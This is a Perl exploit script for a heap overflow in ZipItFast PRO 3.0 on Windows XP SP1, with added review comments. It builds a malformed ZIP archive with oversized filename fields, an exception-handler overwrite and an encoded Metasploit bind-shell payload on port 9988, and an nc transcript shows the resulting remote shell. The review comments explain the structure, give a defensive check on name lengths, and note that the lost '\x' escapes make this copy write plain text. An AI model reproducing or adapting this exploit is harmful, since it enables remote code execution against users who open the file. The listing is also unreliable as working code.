
ZipItFast PRO 3.0 Heap Overflow

Posted on 13 July 2012

#!/usr/bin/perl
#---------------------------------------------------------------------------#
# Exploit: ZipItFast PRO v3.0 Heap-Overflow                                 #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows XP SP1                                                        #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/        #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/            #
#           applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe  #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows         #
# requires you to take a step back and roll with the punches not unlike     #
# watching a David Lynch production ;))...                                  #
#                                                                           #
# - "Who is that lady with the log?"                                        #
# + "We call her the log-lady.."                                            #
#---------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.131 9988                                    #
# (UNKNOWN) [192.168.111.131] 9988 (?) open                                 #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:Documents and SettingsOwnerDesktop>                                     #
#---------------------------------------------------------------------------#
#
# Review summary (only what the code below shows): the script writes a single
# file, "Exploit.zip", assembled from three hand-built ZIP structures --
# $head, $head2 and $head3, whose leading "x50x4Bx03x04", "x50x4Bx01x02" and
# "x50x4Bx05x06" signatures correspond to a local file header, a central
# directory entry and an end-of-central-directory record -- each carrying a
# multi-kilobyte filename ($buf1, $buf2). The script itself performs no
# network I/O; the nc transcript above is the author's result, not code.
#
# NOTE(review): in this listing every "\x" escape has lost its backslash, so
# the literals below are plain ASCII text ("x50x4B...") rather than the bytes
# the author evidently intended. The byte-level comments that follow describe
# that intent; what this copy would actually write is ASCII text.
#
# Defensive takeaway: the malformed element is a ZIP name-length field
# (0x0fe4 = 4068) far beyond any real path length. Archive parsers should
# check the declared name/extra lengths against the header and destination
# buffer before copying, and archive scanners can treat a name length
# exceeding the platform path limit as malformed input worth alerting on.

use strict;
use warnings;

# Output path; relative to the current working directory.
my $filename = "Exploit.zip";

# Local file header. "xe4x0f" (little-endian 0x0fe4 = 4068) evidently stands
# in for the filename length and equals length($buf1) = 4064 + 4 below.
my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00";

# Central directory entry; repeats the same 0x0fe4 name length. The trailing
# "x01x00" / "x24x00x00x00" fields are not verified here.
my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

# End-of-central-directory record. "x12x10x00x00" = 0x1012 = 4114 and
# "x02x10x00x00" = 0x1002 = 4098 are consistent with 46 + 4068 (one central
# entry with a 4068-byte name) and 30 + 4068 (one local header with the same
# name length) -- i.e. the record is sized to match the two headers above.
my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
# Payload bytes as generated by the tool named above (per the author's note:
# a 744-byte, alphanumeric-encoded bind shell on port 9988). Not analysed
# here beyond that; it is placed into $buf2 below.
my $ph33r = "x89xe2xdaxd5xd9x72xf4x58x50x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x39x6cx39x78x4cx49x55x50x47x70" .
"x55x50x35x30x6fx79x59x75x54x71x78x52x52x44" .
"x6ex6bx42x72x44x70x6ex6bx30x52x56x6cx4ex6b" .
"x30x52x35x44x4ex6bx52x52x77x58x56x6fx68x37" .
"x61x5ax46x46x64x71x79x6fx74x71x6fx30x6cx6c" .
"x75x6cx65x31x33x4cx56x62x34x6cx31x30x6fx31" .
"x4ax6fx64x4dx73x31x6ax67x6dx32x4cx30x70x52" .
"x56x37x4ex6bx50x52x76x70x6cx4bx61x52x77x4c" .
"x73x31x6ax70x4cx4bx37x30x52x58x6fx75x79x50" .
"x72x54x73x7ax45x51x4ax70x42x70x4cx4bx32x68" .
"x65x48x6cx4bx63x68x65x70x76x61x39x43x6bx53" .
"x65x6cx77x39x4ex6bx76x54x4cx4bx76x61x48x56" .
"x76x51x49x6fx55x61x79x50x6ex4cx6fx31x58x4f" .
"x56x6dx45x51x38x47x66x58x69x70x42x55x6ax54" .
"x74x43x53x4dx5ax58x77x4bx73x4dx64x64x33x45" .
"x48x62x73x68x6ex6bx61x48x76x44x76x61x6ax73" .
"x50x66x6ex6bx46x6cx62x6bx6cx4bx36x38x35x4c" .
"x56x61x4bx63x6cx4bx43x34x6ex6bx33x31x7ax70" .
"x6ex69x62x64x34x64x56x44x33x6bx63x6bx50x61" .
"x31x49x73x6ax72x71x79x6fx59x70x32x78x33x6f" .
"x32x7ax4ex6bx56x72x68x6bx6bx36x43x6dx71x78" .
"x47x43x55x62x47x70x67x70x71x78x53x47x42x53" .
"x50x32x31x4fx46x34x53x58x70x4cx30x77x76x46" .
"x47x77x6bx4fx38x55x6fx48x6ex70x37x71x77x70" .
"x77x70x65x79x6fx34x42x74x76x30x75x38x46x49" .
"x6bx30x30x6bx53x30x79x6fx4ex35x30x50x62x70" .
"x62x70x52x70x33x70x42x70x51x50x42x70x72x48" .
"x68x6ax74x4fx39x4fx79x70x69x6fx4ex35x6ex69" .
"x6fx37x34x71x4bx6bx76x33x63x58x66x62x65x50" .
"x35x77x55x54x6ex69x4ax46x51x7ax56x70x33x66" .
"x66x37x51x78x6fx32x39x4bx77x47x55x37x6bx4f" .
"x4bx65x66x33x31x47x50x68x4dx67x48x69x75x68" .
"x4bx4fx49x6fx4ex35x32x73x62x73x62x77x32x48" .
"x43x44x68x6cx45x6bx6dx31x6bx4fx4ex35x42x77" .
"x6fx79x78x47x52x48x62x55x70x6ex30x4dx75x31" .
"x6bx4fx59x45x53x58x50x63x62x4dx32x44x73x30" .
"x4fx79x79x73x63x67x56x37x73x67x35x61x39x66" .
"x51x7ax66x72x36x39x61x46x58x62x6bx4dx63x56" .
"x39x57x70x44x34x64x37x4cx53x31x57x71x4ex6d" .
"x70x44x66x44x74x50x7ax66x75x50x42x64x62x74" .
"x36x30x71x46x42x76x30x56x72x66x30x56x30x4e" .
"x70x56x76x36x73x63x53x66x33x58x72x59x38x4c" .
"x47x4fx4cx46x59x6fx4ax75x6fx79x59x70x50x4e" .
"x53x66x71x56x59x6fx56x50x75x38x34x48x6fx77" .
"x37x6dx63x50x59x6fx79x45x4fx4bx48x70x6cx75" .
"x4cx62x31x46x45x38x6fx56x5ax35x4dx6dx6fx6d" .
"x79x6fx5ax75x55x6cx37x76x53x4cx45x5ax4fx70" .
"x79x6bx4dx30x43x45x73x35x4dx6bx63x77x77x63" .
"x70x72x50x6fx70x6ax77x70x61x43x59x6fx79x45" .
"x41x41";

# First (local header) filename: 4064 filler bytes plus ".txt" = 4068 bytes,
# the value encoded as "xe4x0f" in $head/$head2. Note that `x` binds tighter
# than `.`, so this is ("A" x 4064) . ".txt".
my $buf1 = "A" x 4064 . ".txt";

#################
# EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE)
# EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode)
# Jump over Blink and Flink => EB 0A
#################
# The two 4-byte groups are the little-endian forms of the addresses the
# author names above (0x77fc320c and 0x0012fa20); they are specific to the
# author's Windows XP SP1 environment and will not hold elsewhere.
my $magic = "xEBx0A" . "x0Cx32xFCx77" . "x20xFAx12x00";

##################
# Notice that the offsets don't correspond exactly. I experienced some buffer
# expansion and compression depending on the buffer structure so keep that in
# mind if you want to do some testing.
#
# Remember to set Anti-Debugging flags in your debugger..
# (immunity = > !hidedebug All_Debug)
##################
# Second (central directory) filename: 253 filler bytes, $magic, 300 filler
# bytes, the payload, 2756 filler bytes, ".txt".
my $buf2 = "x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt";

# Archive layout: local header, name, central entry, name, EOCD.
my $zip = $head.$buf1.$head2.$buf2.$head3;

# NOTE(review): bareword filehandle with a 2-arg open whose mode is part of
# the interpolated string; the modern idiom is a lexical handle with 3-arg
# open -- open(my $fh, '>', $filename) or die ... -- and close() should be
# checked too, since buffered write errors only surface there.
open(FILE,">$filename") || die "[-]Error: $! ";
print FILE $zip;
close(FILE);

 
